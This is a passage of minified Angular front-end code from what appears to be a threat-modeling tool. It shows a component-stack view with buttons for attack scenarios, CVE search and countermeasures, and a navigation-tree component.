e&&e==this.selectedComponent?this.theme.Primary:this.theme.IsDarkMode?"white":"black"}GetComponentPort(e){if(e.TypeID==zr.Software){const i=e.GetProperties().find(n=>n.Type==Ii.PortBox);if(i)return e.GetProperty(i.ID)}return null}AddThreat(e){if(e||(e=this.selectedComponent),e){let i=this.dataService.Project.CreateAttackScenario(this.stack.ID,!1);i.SetMapping("",[],e,[e],null,null,null,null),i.IsGenerated=!1,this.dialogService.OpenAttackScenarioDialog(i,!0).subscribe(n=>{n||this.dataService.Project.DeleteAttackScenario(i)})}}ShowCVESearch(){this.dialogService.OpenCveSearchDialog(this.selectedComponent,this.stack.ID)}AddTestCase(e){if(e||(e=this.selectedComponent),e){const i=this.dataService.Project.CreateTestCase();i.AddLinkedElement(e),this.dialogService.OpenTestCaseDialog(i,!0).subscribe(n=>{n||this.dataService.Project.DeleteTestCase(i)})}}AddCountermeasure(e){if(e||(e=this.selectedComponent),e){let i=this.dataService.Project.CreateCountermeasure(this.stack.ID,!1);i.SetMapping(null,[e],[]),this.dialogService.OpenCountermeasureDialog(i,!0,this.stack.GetChildrenFlat()).subscribe(n=>{n||this.dataService.Project.DeleteCountermeasure(i)})}}OnDeleteElement(e){this.dialogService.OpenDeleteObjectDialog(e).subscribe(i=>{i&&this.dataService.Project.DeleteComponent(e)})}MoveLeft(e){const i=this.GetGroups().find(T=>this.GetComponents(T).includes(e)),n=this.GetComponents(i),r=this.stack.GetChildren(),c=r.indexOf(e),d=r.indexOf(n[n.indexOf(e)-1]);if(c>0&&d>=0){const T=this.stack.Data.childrenIDs;T.splice(d,0,T.splice(c,1)[0])}}MoveRight(e){const i=this.GetGroups().find(T=>this.GetComponents(T).includes(e)),n=this.GetComponents(i),r=this.stack.GetChildren(),c=r.indexOf(e),d=r.indexOf(n[n.indexOf(e)+1]);if(c<r.length-1&&d>=0){const T=this.stack.Data.childrenIDs;T.splice(d,0,T.splice(c,1)[0])}}OpenContextMenu(e,i){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i},this.matMenuTrigger.openMenu()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(vu),Ee(Wn),Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["app-stack"]],viewQuery:function(e,i){if(1&e&&Mi(po,5),2&e){let n;Vt(n=Bt())&&(i.matMenuTrigger=n.first)}},inputs:{stack:"stack",selectedComponent:"selectedComponent"},outputs:{selectionChanged:"selectionChanged"},decls:89,vars:56,consts:[[2,"width","100%","height","100%"],[1,"tools","mat-elevation-z8"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"disabled","matTooltip","click"],["xmlns","http://www.w3.org/2000/svg","width","25","height","25","version","1.1"],["x","1","y","1","width","23","height","23","rx","3","ry","3"],["x","2","y","16",1,"heavy"],["mat-button","","class","toolBtn","matTooltipShowDelay","1000",3,"disabled","matTooltip","click",4,"ngIf"],[2,"border-spacing","0 20px",3,"dragover"],[3,"drop",4,"ngFor","ngForOf"],[1,"group",2,"font-size","x-small"],[2,"display","flex","flex-wrap","wrap"],[2,"position","relative"],[1,"component","component-legend"],[1,"component","component-legend",2,"opacity","0.5"],[1,"component","component-legend","component-third-party"],[1,"component","component-legend",2,"border-style","dotted"],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["rightMenu","matMenu"],["matMenuContent",""],[3,"drop"],[1,"group"],["style","position: relative;",4,"ngFor","ngForOf"],["style","visibility: hidden;","class","component",4,"ngIf"],["matBadgeColor","primary","matBadgePosition","below",1,"component",3,"matBadge","matBadgeHidden","click","dblclick","contextmenu"],["class","component-base component-port",3,"component-dark",4,"ngIf"],[1,"component-base","component-port"],[1,"component",2,"visibility","hidden"],[4,"ngIf"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"click",4,"ngIf"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){if(1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"div",1),s(3,"\n    "),m(4,"button",2),he("click",function(){return i.AddThreat(i.selectedComponent)}),oe(5,"translate"),s(6,"\n      "),m(7,"mat-icon"),s(8,"flash_on"),u(),s(9,"\n    "),u(),s(10,"\n    "),m(11,"button",2),he("click",function(){return i.ShowCVESearch()}),oe(12,"translate"),s(13,"\n      "),s(14,"\n      "),fi(),m(15,"svg",3),s(16,"\n        "),it(17,"rect",4),s(18,"\n        "),m(19,"text",5),s(20,"CVE"),u(),s(21,"\n      "),u(),s(22,"\n    "),u(),s(23,"\n    "),ne(24,oRe,6,4,"button",6),s(25,"\n    "),ln(),m(26,"button",2),he("click",function(){return i.AddCountermeasure(i.selectedComponent)}),oe(27,"translate"),s(28,"\n      "),m(29,"mat-icon"),s(30,"security"),u(),s(31,"\n    "),u(),s(32,"\n  "),u(),s(33,"\n  "),m(34,"table",7),he("dragover",function(r){return i.AllowDrop(r)}),s(35,"\n    "),m(36,"tbody"),s(37,"\n      "),ne(38,lRe,13,3,"tr",8),s(39,"\n      "),m(40,"tr"),s(41,"\n        "),m(42,"td")(43,"p",9),s(44),oe(45,"translate"),u()(),s(46,"\n        "),m(47,"td",10),s(48,"\n          "),m(49,"div",11),s(50,"\n            "),m(51,"button",12),s(52),oe(53,"translate"),u(),s(54,"\n          "),u(),s(55,"\n          "),m(56,"div",11),s(57,"\n            "),m(58,"button",13),s(59),oe(60,"translate"),u(),s(61,"\n          "),u(),s(62,"\n          "),m(63,"div",11),s(64,"\n            "),m(65,"button",14),s(66),oe(67,"translate"),u(),s(68,"\n          "),u(),s(69,"\n          "),m(70,"div",11),s(71,"\n            "),m(72,"button",15),s(73),oe(74,"translate"),u(),s(75,"\n          "),u(),s(76,"\n        "),u(),s(77,"\n      "),u(),s(78,"\n    "),u(),s(79,"\n  "),u(),s(80,"\n\n  "),it(81,"div",16),s(82," \n  "),m(83,"mat-menu",null,17),s(85," \n    "),ne(86,hRe,3,1,"ng-template",18),s(87," \n  "),u(),s(88," \n"),u()),2&e){const n=Ti(84);C(2),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),C(2),at("matTooltip",re(5,40,"pages.modeling.diagram.addAttackScenario")),V("disabled",!i.selectedComponent),C(7),at("matTooltip",re(12,42,"pages.modeling.diagram.CveSearch")),V("disabled",!i.selectedComponent),C(6),Rt("fill",i.selectedComponent?i.theme.IsDarkMode?"#FFF":"#000":i.theme.IsDarkMode?"#676767":"#B6B6B6"),C(2),Rt("fill",i.theme.IsDarkMode?"#000":"#FFF"),C(5),V("ngIf",i.dataService.Project.HasTesting),C(2),at("matTooltip",re(27,44,"pages.modeling.diagram.addCountermeasure")),V("disabled",!i.selectedComponent),C(12),V("ngForOf",i.GetGroups()),C(6),ke(re(45,46,"pages.modeling.stack.legend")),C(7),ri("border-color",i.GetComponentColor(null)),Ct("component-dark",i.theme.IsDarkMode),C(1),ct("\n              ",re(53,48,"pages.modeling.stack.ActiveComponent"),"\n            "),C(6),ri("border-color",i.GetComponentColor(null)),Ct("component-dark",i.theme.IsDarkMode),C(1),ct("\n              ",re(60,50,"pages.modeling.stack.InactiveComponent"),"\n            "),C(6),ri("border-color",i.GetComponentColor(null)),Ct("component-dark",i.theme.IsDarkMode),C(1),ct("\n              ",re(67,52,"pages.modeling.stack.ThirdPartyComponent"),"\n            "),C(6),ri("border-color",i.GetComponentColor(null)),Ct("component-dark",i.theme.IsDarkMode),C(1),ct("\n              ",re(74,54,"pages.modeling.stack.OutOfScopeComponent"),"\n            "),C(8),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),V("matMenuTriggerFor",n)}},dependencies:[Zi,Ri,oa,Hh,da,Xo,qo,po,Zc,Pa,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:30px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 70px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.group[_ngcontent-%COMP%]{transform-origin:center;transform:rotate(-90deg);text-align:center;margin:0;font-weight:700;font-size:smaller;max-width:100px}.component-base[_ngcontent-%COMP%], .component[_ngcontent-%COMP%]{background:none;margin:5px;cursor:pointer;border-radius:5px}.component[_ngcontent-%COMP%]{font-size:large;height:75px;min-width:130px;border-radius:10px}.component-dark[_ngcontent-%COMP%]{border-color:#fff;color:#fff}.component-third-party[_ngcontent-%COMP%]{background-color:#ffffff1a}.component-port[_ngcontent-%COMP%]{position:absolute;left:4px;bottom:4px;border:2px solid;padding:0 2px}.component-legend[_ngcontent-%COMP%]{font-size:small;height:25px;min-width:60px;border-radius:5px}.tools[_ngcontent-%COMP%]{display:block;float:left;height:27px;width:100%}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}.toolBtn-Selected[_ngcontent-%COMP%]{background-color:#ffffff26}',".heavy[_ngcontent-%COMP%] {\n          font: bold 10px sans-serif;\n        }"]}),t})(),xa=(()=>{class t{constructor(){this.Nodes=[],this.nodeTreeChanged=new Tt}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e}FindNodeOfObject(e){return t.findNodeOfObjectRec(e,this.Nodes)}static TransferExpandedState(e,i){if(null==e||null==i)return;let n=t.FlattenNodes(e);t.FlattenNodes(i).forEach(c=>{if(null!=c.data){let d=n.find(T=>T.data==c.data);d&&null!=d.isExpanded&&(c.isExpanded=d.isExpanded)}else{let d=n.filter(T=>T.name()==c.name()&&null==T.data);1==(null==d?void 0:d.length)&&d[0]&&null!=d[0].isExpanded&&(c.isExpanded=d[0].isExpanded)}})}static FlattenNodes(e){let i=[],n=r=>{r.forEach(c=>{i.push(c),c.children&&n(c.children)})};return n(e),i}static FindNodeOfObject(e,i){return t.findNodeOfObjectRec(e,i)}static findNodeOfObjectRec(e,i){for(let n=0;n<i.length;n++){if(i[n].data==e)return i[n];if(i[n].children){let r=this.findNodeOfObjectRec(e,i[n].children);if(r)return r}}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ng-component"]],inputs:{selectedNode:"selectedNode"},outputs:{nodeTreeChanged:"nodeTreeChanged"},decls:0,vars:0,template:function(e,i){},encapsulation:2}),t})();const fRe=["ctxMenu"];function pRe(t,a){if(1&t){const e=Ye();m(0,"mat-checkbox",20),he("change",function(){be(e);const n=B().$implicit;return Me(B().OnNodeChecked(n))}),u()}if(2&t){const e=B().$implicit,i=B();V("disabled",!e.checkEnabled||!i.checkEnabled)("checked",e.isChecked)}}function _Re(t,a){if(1&t&&(m(0,"mat-icon",21),s(1),u()),2&t){const e=B().$implicit;C(1),ke(e.icon)}}function gRe(t,a){if(1&t&&(m(0,"span",22),s(1),u()),2&t){const e=B().$implicit;ri("opacity",e.isInactive&&e.isInactive()?.5:1),at("matTooltip",e.tooltip),C(1),ke(e.name())}}function CRe(t,a){if(1&t&&(m(0,"span",23),s(1),u()),2&t){const e=B().$implicit;ri("opacity",e.isInactive&&e.isInactive()?.5:1),at("matTooltip",e.tooltipExtension),C(1),ke(e.nameExtension)}}function yRe(t,a){if(1&t){const e=Ye();bt(0),m(1,"input",24),he("keydown",function(n){be(e);const r=B().$implicit;return Me(B().OnRename(n,r))})("focusout",function(n){be(e);const r=B().$implicit;return Me(B().OnRename(n,r))}),u(),Mt()}if(2&t){const e=B().$implicit,i=B();C(1),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",e.name())}}function bRe(t,a){if(1&t){const e=Ye();m(0,"button",25),he("click",function(){be(e);const n=B().$implicit;return Me(B().OnEditName(n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"edit"),u()()}2&t&&at("matTooltip",re(1,1,"general.Rename"))}function MRe(t,a){if(1&t){const e=Ye();m(0,"button",25),he("click",function(){return be(e),Me(B().$implicit.onDuplicate())}),oe(1,"translate"),m(2,"mat-icon"),s(3,"content_copy"),u()()}2&t&&at("matTooltip",re(1,1,"general.Duplicate"))}function vRe(t,a){if(1&t){const e=Ye();m(0,"button",25),he("click",function(){return be(e),Me(B().$implicit.onDelete())}),oe(1,"translate"),m(2,"mat-icon"),s(3,"delete"),u()()}2&t&&at("matTooltip",re(1,1,"general.Delete"))}function ARe(t,a){if(1&t){const e=Ye();m(0,"button",25),he("click",function(){return be(e),Me(B().$implicit.onAdd())}),oe(1,"translate"),m(2,"mat-icon"),s(3,"add"),u()()}2&t&&at("matTooltip",re(1,1,"general.Add"))}function TRe(t,a){if(1&t&&(m(0,"button",26),oe(1,"translate"),m(2,"mat-icon"),s(3,"add"),u()()),2&t){B();const e=Ti(23);at("matTooltip",re(1,2,"general.Add")),V("matMenuTriggerFor",e)}}function ERe(t,a){if(1&t){const e=Ye();m(0,"button",27),he("click",function(){const r=be(e).$implicit;return Me(B().$implicit.onAdd(r))}),s(1),u()}if(2&t){const e=a.$implicit;C(1),ke(e)}}function DRe(t,a){if(1&t&&(m(0,"mat-icon",28),s(1),u()),2&t){const e=B().$implicit;C(1),ke(e.icon)}}function xRe(t,a){if(1&t){const e=Ye();m(0,"mat-tree-node",9),he("click",function(n){const c=be(e).$implicit;return Me(B().OnNodeClick(c,n))})("dblclick",function(){const r=be(e).$implicit;return Me(B().OnNodeDoubleClick(r))})("contextmenu",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),s(1,"\n    "),ne(2,pRe,1,2,"mat-checkbox",10),s(3,"\n    "),ne(4,_Re,2,1,"mat-icon",11),s(5,"\n    "),ne(6,gRe,2,4,"span",12),s(7,"\n    "),ne(8,CRe,2,4,"span",13),s(9,"\n    "),ne(10,yRe,2,2,"ng-container",14),s(11,"\n    "),ne(12,bRe,4,3,"button",15),s(13,"\n    "),ne(14,MRe,4,3,"button",15),s(15,"\n    "),ne(16,vRe,4,3,"button",15),s(17,"\n    "),ne(18,ARe,4,3,"button",15),s(19,"\n    "),ne(20,TRe,4,4,"button",16),s(21,"\n    "),m(22,"mat-menu",null,17),s(24,"\n      "),ne(25,ERe,2,1,"button",18),s(26,"\n    "),u(),s(27,"\n    "),ne(28,DRe,2,1,"mat-icon",19),s(29,"\n  "),u()}if(2&t){const e=a.$implicit,i=B();ri("font-weight",e.isBold?"bold":"normal")("cursor",i.CanSelet(e)?"pointer":"auto"),Ct("highlight-light",i.activeNode===e&&!i.theme.IsDarkMode)("highlight-dark",i.activeNode===e&&i.theme.IsDarkMode),C(2),V("ngIf",e.canCheck),C(2),V("ngIf",e.iconAlignLeft&&e.icon),C(2),V("ngIf",!e.isRenaming),C(2),V("ngIf",e.nameExtension&&!e.isRenaming),C(2),V("ngIf",e.isRenaming),C(2),V("ngIf",e.canRename&&!e.isRenaming),C(2),V("ngIf",e.canDuplicate),C(2),V("ngIf",e.canDelete),C(2),V("ngIf",e.canAdd&&!e.addOptions),C(2),V("ngIf",e.canAdd&&e.addOptions),C(5),V("ngForOf",e.addOptions),C(3),V("ngIf",!e.iconAlignLeft&&e.icon)}}function wRe(t,a){if(1&t){const e=Ye();m(0,"mat-checkbox",20),he("change",function(){be(e);const n=B().$implicit;return Me(B().OnNodeChecked(n))}),u()}if(2&t){const e=B().$implicit,i=B();V("disabled",!e.checkEnabled||!i.checkEnabled)("checked",e.isChecked)}}function IRe(t,a){if(1&t&&(m(0,"mat-icon",21),s(1),u()),2&t){const e=B().$implicit;C(1),ke(e.icon)}}function RRe(t,a){if(1&t&&(m(0,"span",38),s(1),u()),2&t){const e=B().$implicit;ri("opacity",e.isInactive&&e.isInactive()?.5:1),at("matTooltip",e.tooltip),C(1),ke(e.name())}}function SRe(t,a){if(1&t&&(m(0,"span",23),s(1),u()),2&t){const e=B().$implicit;ri("opacity",e.isInactive&&e.isInactive()?.5:1),at("matTooltip",e.tooltipExtension),C(1),ke(e.nameExtension)}}function kRe(t,a){if(1&t){const e=Ye();bt(0),m(1,"input",24),he("keydown",function(n){be(e);const r=B().$implicit;return Me(B().OnRename(n,r))})("focusout",function(n){be(e);const r=B().$implicit;return Me(B().OnRename(n,r))}),u(),Mt()}if(2&t){const e=B().$implicit,i=B();C(1),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",e.name())}}function PRe(t,a){if(1&t){const e=Ye();m(0,"button",25),he("click",function(){be(e);const n=B().$implicit;return Me(B().OnEditName(n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"edit"),u()()}2&t&&at("matTooltip",re(1,1,"general.Rename"))}function ORe(t,a){if(1&t){const e=Ye();m(0,"button",25),he("click",function(){return be(e),Me(B().$implicit.onDelete())}),oe(1,"translate"),m(2,"mat-icon"),s(3,"delete"),u()()}2&t&&at("matTooltip",re(1,1,"general.Delete"))}function NRe(t,a){if(1&t){const e=Ye();m(0,"button",25),he("click",function(){return be(e),Me(B().$implicit.onAdd())}),oe(1,"translate"),m(2,"mat-icon"),s(3,"add"),u()()}2&t&&at("matTooltip",re(1,1,"general.Add"))}function LRe(t,a){if(1&t&&(m(0,"button",26),oe(1,"translate"),m(2,"mat-icon"),s(3,"add"),u()()),2&t){B();const e=Ti(29);at("matTooltip",re(1,2,"general.Add")),V("matMenuTriggerFor",e)}}function zRe(t,a){if(1&t){const e=Ye();m(0,"button",27),he("click",function(){const r=be(e).$implicit;return Me(B().$implicit.onAdd(r))}),s(1),u()}if(2&t){const e=a.$implicit;C(1),ke(e)}}const WRe=function(t){return{item:t}};function FRe(t,a){if(1&t&&(m(0,"button",39),oe(1,"translate"),m(2,"mat-icon"),s(3,"more_vert"),u()()),2&t){const e=B().$implicit;B();const i=Ti(11);at("matTooltip",re(1,3,"general.More")),V("matMenuTriggerFor",i)("matMenuTriggerData",fr(5,WRe,e))}}function VRe(t,a){if(1&t&&(m(0,"mat-icon",40),s(1),u()),2&t){const e=B().$implicit;ri("margin-left",e.hasMenu?"0":"auto"),C(1),ke(e.icon)}}function BRe(t,a){if(1&t){const e=Ye();m(0,"mat-nested-tree-node",29),he("click",function(n){const c=be(e).$implicit;return Me(B().OnNodeClick(c,n))})("dblclick",function(){const r=be(e).$implicit;return Me(B().OnNodeDoubleClick(r))})("contextmenu",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),s(1,"\n    "),m(2,"div",30),s(3,"\n      "),m(4,"button",31),he("click",function(){const r=be(e).$implicit;return Me(r.isExpanded=!r.isExpanded)}),s(5,"\n        "),m(6,"mat-icon",32),s(7),u(),s(8,"\n      "),u(),s(9,"\n      "),ne(10,wRe,1,2,"mat-checkbox",10),s(11,"\n      "),ne(12,IRe,2,1,"mat-icon",11),s(13,"\n      "),ne(14,RRe,2,4,"span",33),s(15,"\n      "),ne(16,SRe,2,4,"span",13),s(17,"\n      "),ne(18,kRe,2,2,"ng-container",14),s(19,"\n      "),ne(20,PRe,4,3,"button",15),s(21,"\n      "),ne(22,ORe,4,3,"button",15),s(23,"\n      "),ne(24,NRe,4,3,"button",15),s(25,"\n      "),ne(26,LRe,4,4,"button",16),s(27,"\n      "),m(28,"mat-menu",null,17),s(30,"\n        "),ne(31,zRe,2,1,"button",18),s(32,"\n      "),u(),s(33,"\n      "),ne(34,FRe,4,7,"button",34),s(35,"\n      "),ne(36,VRe,2,3,"mat-icon",35),s(37,"\n    "),u(),s(38,"\n    "),s(39,"\n    "),m(40,"div",36),s(41,"\n      "),Ir(42,37),s(43,"\n    "),u(),s(44,"\n  "),u()}if(2&t){const e=a.$implicit,i=B();ri("cursor",i.CanSelet(e)?"pointer":"auto"),C(2),Ct("highlight-light",i.activeNode===e&&!i.theme.IsDarkMode)("highlight-dark",i.activeNode===e&&i.theme.IsDarkMode),C(5),ct("\n          ",i.treeControl.isExpanded(e)?"expand_more":"chevron_right","\n        "),C(3),V("ngIf",e.canCheck),C(2),V("ngIf",e.iconAlignLeft&&e.icon),C(2),V("ngIf",!e.isRenaming),C(2),V("ngIf",e.nameExtension&&!e.isRenaming),C(2),V("ngIf",e.isRenaming),C(2),V("ngIf",e.canRename&&!e.isRenaming),C(2),V("ngIf",e.canDelete),C(2),V("ngIf",e.canAdd&&!e.addOptions),C(2),V("ngIf",e.canAdd&&e.addOptions),C(5),V("ngForOf",e.addOptions),C(3),V("ngIf",e.hasMenu),C(2),V("ngIf",!e.iconAlignLeft&&e.icon),C(4),Ct("nav-tree-invisible",!i.treeControl.isExpanded(e))}}function HRe(t,a){if(1&t){const e=Ye();s(0,"\n        "),m(1,"button",27),he("click",function(){be(e);const n=B().item;return Me(B().OnCollapse(n,0))}),s(2,"\n          "),m(3,"span"),s(4),oe(5,"translate"),u(),s(6,"\n        "),u(),s(7,"\n        "),m(8,"button",27),he("click",function(){be(e);const n=B().item;return Me(B().OnCollapse(n,1))}),s(9,"\n          "),m(10,"span"),s(11),oe(12,"translate"),u(),s(13,"\n        "),u(),s(14,"\n        "),m(15,"button",27),he("click",function(){be(e);const n=B().item;return Me(B().OnCollapse(n,2))}),s(16,"\n          "),m(17,"span"),s(18),oe(19,"translate"),u(),s(20,"\n        "),u(),s(21,"\n      ")}2&t&&(C(4),ke(re(5,3,"nav-tree.level0")),C(7),ke(re(12,5,"nav-tree.level1")),C(7),ke(re(19,7,"nav-tree.level2")))}function URe(t,a){if(1&t){const e=Ye();s(0,"\n        "),m(1,"button",27),he("click",function(){be(e);const n=B().item;return Me(B().OnExpand(n,0))}),s(2,"\n          "),m(3,"span"),s(4),oe(5,"translate"),u(),s(6,"\n        "),u(),s(7,"\n        "),m(8,"button",27),he("click",function(){be(e);const n=B().item;return Me(B().OnExpand(n,1))}),s(9,"\n          "),m(10,"span"),s(11),oe(12,"translate"),u(),s(13,"\n        "),u(),s(14,"\n        "),m(15,"button",27),he("click",function(){be(e);const n=B().item;return Me(B().OnExpand(n,2))}),s(16,"\n          "),m(17,"span"),s(18),oe(19,"translate"),u(),s(20,"\n        "),u(),s(21,"\n      ")}2&t&&(C(4),ke(re(5,3,"nav-tree.level0")),C(7),ke(re(12,5,"nav-tree.level1")),C(7),ke(re(19,7,"nav-tree.level2")))}function qRe(t,a){if(1&t&&(s(0,"\n    "),m(1,"button",41),s(2,"\n      "),m(3,"mat-icon"),s(4,"chevron_right"),u(),s(5,"\n      "),m(6,"span"),s(7),oe(8,"translate"),u(),s(9,"\n    "),u(),s(10,"\n    "),m(11,"mat-menu",null,42),s(13,"\n      "),ne(14,HRe,22,9,"ng-template",4),s(15," \n    "),u(),s(16,"\n    "),m(17,"button",41),s(18,"\n      "),m(19,"mat-icon"),s(20,"expand_more"),u(),s(21,"\n      "),m(22,"span"),s(23),oe(24,"translate"),u(),s(25,"\n    "),u(),s(26,"\n    "),m(27,"mat-menu",null,43),s(29,"\n      "),ne(30,URe,22,9,"ng-template",4),s(31," \n    "),u(),s(32,"\n  ")),2&t){const e=Ti(12),i=Ti(28);C(1),V("matMenuTriggerFor",e),C(6),ke(re(8,4,"nav-tree.collapse")),C(10),V("matMenuTriggerFor",i),C(6),ke(re(24,6,"nav-tree.expand"))}}function GRe(t,a){if(1&t&&(m(0,"span",47),s(1),u()),2&t){const e=B().item;C(1),ke(e.name())}}const jRe=function(t,a){return{groups:t,item:a}};function QRe(t,a){if(1&t){const e=Ye();s(0,"\n    "),ne(1,GRe,2,1,"span",44),s(2," \n    "),m(3,"button",45),he("click",function(){const r=be(e).item;return Me(B().OnMoveUp(r))}),s(4,"\n      "),m(5,"mat-icon"),s(6,"arrow_upward"),u(),s(7,"\n      "),m(8,"span"),s(9),oe(10,"translate"),u(),s(11,"\n    "),u(),s(12,"\n    "),m(13,"button",45),he("click",function(){const r=be(e).item;return Me(B().OnMoveDown(r))}),s(14,"\n      "),m(15,"mat-icon"),s(16,"arrow_downward"),u(),s(17,"\n      "),m(18,"span"),s(19),oe(20,"translate"),u(),s(21,"\n    "),u(),s(22,"\n    "),m(23,"button",46),s(24,"\n      "),m(25,"mat-icon"),s(26,"low_priority"),u(),s(27,"\n      "),m(28,"span"),s(29),oe(30,"translate"),u(),s(31,"\n    "),u(),s(32,"\n  ")}if(2&t){const e=a.item;B();const i=Ti(26);C(1),V("ngIf",e),C(2),V("disabled",!e.canMoveUpDown),C(6),ke(re(10,9,"nav-tree.moveUp")),C(4),V("disabled",!e.canMoveUpDown),C(6),ke(re(20,11,"nav-tree.moveDown")),C(4),V("disabled",!e.canMoveToGroup)("matMenuTriggerFor",i)("matMenuTriggerData",Ah(15,jRe,e.onMoveToGroups?e.onMoveToGroups():null,e)),C(6),ke(re(30,13,"nav-tree.moveToGroup"))}}function $Re(t,a){if(1&t){const e=Ye();m(0,"button",27),he("click",function(){const r=be(e).$implicit,c=B().item;return Me(B().OnMoveToGroup(c,r))}),s(1),u()}if(2&t){const e=a.$implicit;C(1),ke(e.name())}}function KRe(t,a){if(1&t&&(s(0,"\n    "),ne(1,$Re,2,1,"button",18),s(2,"\n  ")),2&t){const e=a.groups;C(1),V("ngForOf",e)}}let df=(()=>{class t{constructor(e,i){this.theme=e,this.dataService=i,this.treeControl=new Rz(n=>n.children),this.dataSource=new HW,this.checkEnabled=!0,this.canCheckMultiple=!0,this.selectedNodeChanged=new Tt,this.checkedNodesChanged=new Tt,this.nodeDoubleClicked=new Tt,this.menuTopLeftPosition={x:"0",y:"0"},this.HasChild=(n,r)=>!!r.children&&r.children.length>0}get activeNode(){return this._activeNode}set activeNode(e){this._activeNode=e,this.selectedNodeChanged.emit(e),setTimeout(()=>{var i;null===(i=document.getElementById("renameBox"))||void 0===i||i.focus()},100)}set checkedNodes(e){xa.FlattenNodes(this.dataSource.data).forEach(n=>{n.isChecked=null==e?void 0:e.some(r=>r.data==n.data)})}ngOnInit(){}OpenContextMenu(e,i){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i},this.matMenuTrigger.openMenu()}OnMoveUp(e){e.onMoveUp(),this.resetDataSource()}OnMoveDown(e){e.onMoveDown(),this.resetDataSource()}OnMoveToGroup(e,i){e.onMoveToGroup(i)}OnCollapse(e,i){var n,r,c,d;1==i?null===(n=e.children)||void 0===n||n.forEach(T=>this.treeControl.collapse(T)):2==i?null===(r=e.children)||void 0===r||r.forEach(T=>{var k;return null===(k=T.children)||void 0===k?void 0:k.forEach(q=>this.treeControl.collapse(q))}):0==i&&(this.dataSource.data.includes(e)?this.dataSource.data.forEach(T=>this.treeControl.collapse(T)):null===(d=null===(c=xa.FlattenNodes(this.dataSource.data).find(T=>{var k;return null===(k=T.children)||void 0===k?void 0:k.includes(e)}))||void 0===c?void 0:c.children)||void 0===d||d.forEach(T=>this.treeControl.collapse(T)))}OnExpand(e,i){var n,r,c,d;1==i?(this.treeControl.expand(e),null===(n=e.children)||void 0===n||n.forEach(T=>this.treeControl.expand(T))):2==i?null===(r=e.children)||void 0===r||r.forEach(T=>this.OnExpand(T,1)):0==i&&(this.dataSource.data.includes(e)?this.dataSource.data.forEach(T=>this.OnExpand(T,1)):null===(d=null===(c=xa.FlattenNodes(this.dataSource.data).find(T=>{var k;return null===(k=T.children)||void 0===k?void 0:k.includes(e)}))||void 0===c?void 0:c.children)||void 0===d||d.forEach(T=>this.OnExpand(T,1)))}SetNavTreeData(e,i=null){this.activeNode=null,i&&(this.activeNode=e.find(r=>r.data==i)),this.dataSource.data=e,xa.FlattenNodes(e).forEach(r=>{(r.isExpanded||null==r.isExpanded&&r.children&&r.children.length>0)&&(r.isExpanded=!0,this.treeControl.expand(r))})}OnNodeClick(e,i){i.stopPropagation(),!(!e.canSelect||e.isInactive&&e.isInactive())&&(this.activeNode=e)}OnNodeDoubleClick(e){!e.canSelect||this.nodeDoubleClicked.emit(e)}OnNodeChecked(e){!this.canCheckMultiple&&!e.isChecked&&xa.FlattenNodes(this.dataSource.data).forEach(i=>i.isChecked=!1),e.isChecked=!e.isChecked,this.checkedNodesChanged.emit(xa.FlattenNodes(this.dataSource.data).filter(i=>i.isChecked))}OnEditName(e){e.isRenaming=!0,setTimeout(()=>{var i;null===(i=document.getElementById("renameBox"))||void 0===i||i.focus()},100)}OnRename(e,i){("Enter"===e.key||"focusout"===e.type)&&(i.isRenaming=!1,i.onRename&&i.onRename(e.target.value))}resetDataSource(){let e=this.dataSource.data;this.dataSource.data=null,this.dataSource.data=e}CanSelet(e){return e.canSelect&&!(e.isInactive&&e.isInactive())}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-nav-tree"]],viewQuery:function(e,i){if(1&e&&Mi(fRe,5),2&e){let n;Vt(n=Bt())&&(i.matMenuTrigger=n.first)}},inputs:{activeNode:"activeNode",checkEnabled:"checkEnabled",canCheckMultiple:"canCheckMultiple",checkedNodes:"checkedNodes"},outputs:{selectedNodeChanged:"selectedNodeChanged",checkedNodesChanged:"checkedNodesChanged",nodeDoubleClicked:"nodeDoubleClicked"},decls:30,vars:8,consts:[[1,"nav-tree",2,"background-color","transparent",3,"dataSource","treeControl"],["matTreeNodeToggle","","class","disable-select",3,"highlight-light","highlight-dark","font-weight","cursor","click","dblclick","contextmenu",4,"matTreeNodeDef"],["class","disable-select",3,"cursor","click","dblclick","contextmenu",4,"matTreeNodeDef","matTreeNodeDefWhen"],["menuMenu","matMenu"],["matMenuContent",""],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["ctxMenu","matMenuTrigger"],["rightMenu","matMenu"],["groupsMenu","matMenu"],["matTreeNodeToggle","",1,"disable-select",3,"click","dblclick","contextmenu"],["color","primary","style","margin-right: 5px;",3,"disabled","checked","change",4,"ngIf"],["style","margin-right: 5px;",4,"ngIf"],["style","margin-right: 10px; margin-left: 